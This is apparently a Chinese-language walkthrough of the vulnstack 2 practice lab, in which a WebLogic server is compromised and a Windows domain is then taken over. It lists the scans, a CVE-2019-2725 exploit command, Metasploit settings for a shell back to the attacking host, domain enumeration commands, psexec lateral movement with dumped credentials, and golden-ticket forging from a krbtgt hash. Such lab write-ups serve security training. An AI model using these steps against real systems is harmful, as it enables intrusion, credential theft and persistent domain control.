红日安全vulnstack (二)

参考文章

https://www.cnblogs.com/bktown/p/16904232.html

https://blog.csdn.net/m0_75178803/article/details/136114052?utm_medium=distribute.pc_relevant.none-task-blog-2~default~baidujs_baidulandingword~default-0-136114052-blog-123156086.235^v43^pc_blog_bottom_relevance_base7&spm=1001.2101.3001.4242.1&utm_relevant_index=1

网络拓扑图

1qaz@WSX

环境搭建

解压后找文件内的

vmx

后缀文件,会自动打开虚拟机加载,

PC

为网关服务器,需要两张网卡，一个用来向外网提供

web

服务，一个是通向内网机器,通向外网所以需要再建立一个网卡,保证

PC

和

kali

同一个网段,靶机

Web

和

PC

均是双网卡,

WEB

登陆时切换用户为:

WEB\de1ay

密码:

1qaz@WSX

才能进入,初始无法进入

网卡设置

新增网卡修改子网

IP

VMnet2

相当于新增内网网段,提供给靶场使用,在网络适配器加入

10.10.10.0

DC

域控提供单独的10网段就行了,需要出网机器是两个网络适配器,出网

or

不出网,靶机默认开机密码都是

1qaz@WSX

需要注意的是,

Web

需要切换用户进去登录输入密码才可以

修改Kali网段

靶机

WEB

PC

出网网段默认是

111

我们可以修改

Kali

网卡网段为

111

,使其和两台出网靶机网段一直,这是最方便的方式,也可以不修改原始

Kali

网段,登录进靶机后在网络适配器修改网段为我们

Kali

修改

Kali

网段,发现它是

VMnet8

自定义,打开虚拟网络编辑器,手动修改此网卡为

111

网段

修改成功

Kali

网卡网段,打开它然后测试

IP

地址并对该网段主机进行扫描看看是否能发现

WEB

和

PC

ifconfig

网段扫描是可以成功扫出,说明攻击机

Kali

和靶机已经在同一网段下

arp-scan -l

IP 分布

主机

IP地址

kali 攻击机

192.168.111.128

PC

外网IP 192.168.111.201 / 内网IP 10.10.10.201

WEB

外网IP 192.168.111.80 / 内网IP 10.10.10.80

DC 域控

内网IP 10.10.10.10

Kali

网段扫描出

PC

机器,但是没有

WEB

(

PC

ping不通猜测被拦截或者不出网)

PC

WEB

DC

WEB

渗透

这里我首先使用

nmap

扫描该网段主机,但是发现

WEB一度

扫描不到,排查一番才发现因为网络适配器设置错误,导致不出网络,修改后即可出网.

PC

WEB

适配器均此设置,

NET

自动获取

IP

,代表同

Kali

同一网段,

VMnet2

自定义内网网段

10

,但是这里其实

Kali

是手动改的,反正只要同一个网段就没事

Weblogin

服务开启

打开

WEB

机器,进入

C:\Oracle\Middleware\user_projects\domains\base_domain\bin

路径,输入管理员账户密码

administrator/1qaz@WSX

右键

startWebLogic

执行,代表开启了

Weblogin

服务,

shell

是在此获取的

Kali

端口扫描

kali

中直接

ping

web发现

ping

不通,可能是防火墙的问题,但是

nmap

扫描需要指定扫描方式为

SYN

nmap -sS -sV 192.168.111.80   // -sS 扫描方式SYN  -sV服务识别

端口开启可能存在的漏洞,实验直接照

WP

了 常见端口漏洞

• 445端口开放意味着存在smb服务，可能存在ms17_010永恒之蓝漏洞。
• 139端口，就存在Samba服务，可能存在爆破/未授权访问/远程命令执行漏洞。
• 1433端口，就存在mssql服务，可能存在爆破/注入/SA弱口令。
• 开放7001端口可能存在Weblogi

访问

80

空白

访问

7001

报错页面,报错肯定就是要递归的去扫描的,开字典进行扫描,

70001

是中间件

weblogin

服务默认端口

漏洞扫描

通过

WeblogicScan

扫描和

nuclei

均有效果并给出了漏洞地址,直接梭哈,当然还有其他的工具也能扫描出来比如

Goby

历史CVE

CVE-2017-10271
CVE-2017-3506
CVE-2019-2725
CVE-1019-2729

漏洞地址

http://192.168.111.80:7001/console/login/LoginForm.jsp

CVE

工具利用

知道了存在反序列化漏洞,在网上寻找相关

exp

GItHub地址

工具梭哈得到了命令执行地址

pip install logzero 
 pip install requests 
 python weblogic-2019-2725.py 10.3.6 http://192.168.111.80:7001
 
 命令执行地址:
 
 http://192.168.111.80:7001/bea_wls_internal/demo.jsp?pwd=admin&cmd=ipconfig

CVE

工具虽然给出了

Webshell

地址和密码但是我利用连接工具却连接不上,重新找一个利用工具使用,上传新的马子

Java反序列化利用工具

MSF

上线

search  CVE-2019-2725   // 寻找CVE

use 0 // 使用第一个

set rhost 192.168.111.80  // 出现漏洞的地址
  set lhost 192.168.111.128  // kali地址
  set target 1  // 设置目标版本为第一个 代表是windows系统
  
  run  // 攻击

利用成功得到

shell

MSF权限Shell至CS

内网渗透

域内信息收集

查看本机所在域

shell ipconfig /all 

所在域: delay.com

扫描

IP

发现内网

10

网段

shell ipconfig

shell  net group "domain controllers" /domain  

域控: DC

net group "domain computers" /domain  //  查看域中的其他主机名 探测到了PC

域内其他主机: PC

ping

域控

DC

和成员主机

PC

收集

IP

地址

PC

不同但是还是得出了地址,包括DC,在列表中可以看到目标

域控制器 : DC.de1ay.com

PC域名 : pc.de1ay.com

凭证横向移动

CS

抓取

WEB

凭证明文和

hash

,利用此凭证横向移动攻击域控

扫描发现域控存在

445

端口开启,故而创建

SMB

监听器,利用凭证配合

psexec

由于weblogic启动需要域管理员密码，而本台webserver2008存在内存明文密码的漏洞 故而可知域管理员账密

administrator/1qaz@WSX

创建SMB监听器横向

拿下域控权限,另一台机器也同理,利用凭证横向过去,这里不错演示

权限维持

黄金票据

DC

域控凭证提权抓取

hash

值得到域控下其他用户的账户密码,关键的用户是

krbtgt

的

hash

值，

krbtgt

用户是域中用来管理发放票据的用户，拥有了该用户的权限，就可以伪造系统中的任意用户

82dfc71b72a11ef37d663047bc2088fb  //krbtgt hash值

伪造条件

• 目标的用户名及域名
• 域的 SID 值
• DC 中 KRBTGT 用户的 NTLM 哈希

logonpasswords  // 查找域的sid

S-1-5-21-2756371121-2868759905-3853650604

输入自定义的用户名和以知信息,伪造黄金票据

回到

WEB

会话面板,远程远程连接

dir

域控

c

盘成功

白银票据

等级低一点的白银票据,条件也是需要获取

sid

和

hash

值